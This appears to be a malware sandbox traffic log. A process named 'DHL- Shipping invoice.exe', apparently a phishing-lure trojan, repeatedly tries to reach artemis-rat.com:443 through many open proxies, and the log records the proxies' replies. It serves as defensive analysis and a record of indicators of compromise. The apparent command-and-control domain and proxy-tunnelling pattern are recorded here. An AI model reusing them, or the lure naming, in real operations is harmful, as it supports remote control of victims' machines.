                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.992878914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.944039106 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            285192.168.2.45094747.88.3.1980806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.996504068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.165723085 CET309INHTTP/1.1 400 Bad Request
                            Server: nginx/1.23.4
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 157
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.4</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            286192.168.2.45082614.103.24.2080006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.001319885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            287192.168.2.450122184.178.172.1741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.001635075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            288192.168.2.450797171.244.140.16088266484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.005227089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.718499899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.750310898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            289192.168.2.45103538.162.11.22531286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.006500959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.317543030 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            290192.168.2.450827106.14.255.124806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.025908947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            291192.168.2.45093523.111.102.15390026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.029094934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.537379980 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            292192.168.2.451057104.20.75.69806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.030328989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.120887041 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            293192.168.2.451069104.20.233.70806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.035542011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.125597000 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            294192.168.2.450177104.238.111.107537776484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.039546967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.062486887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.063054085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.074206114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.062633038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:36.062393904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:48.079188108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:12.249892950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:00.249790907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            295192.168.2.451081172.67.182.107806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.042543888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.134226084 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            296192.168.2.45107120.42.119.47806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.042927027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.343514919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.655998945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.265419960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.596355915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.918129921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.197755098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.641159058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.453421116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            297192.168.2.4510193.10.93.5031286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.046636105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.203965902 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            298192.168.2.45097791.189.177.18831286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.050163031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.250787020 CET1286INHTTP/1.1 403 Forbidden
                            Server: squid/5.7
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 3629
                            X-Squid-Error: ERR_ACCESS_DENIED 0
                            Vary: Accept-Language
                            Content-Language: en
                            X-Cache: MISS from lb1
                            X-Cache-Lookup: NONE from lb1:3128
                            Via: 1.1 lb1 (squid/5.7)
                            Connection: close
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            299192.168.2.451026147.75.34.86100036484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.061877966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.227264881 CET65INHTTP/1.1 200 Connection Established
                            Proxy-Agent: Zscaler/6.3


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            300192.168.2.45017251.75.126.150341446484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.061990023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.062482119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.063067913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            301192.168.2.45097345.11.95.16560456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.064595938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.577884912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.202915907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.562796116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.062866926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.562776089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.062962055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.062897921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:25.062819004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
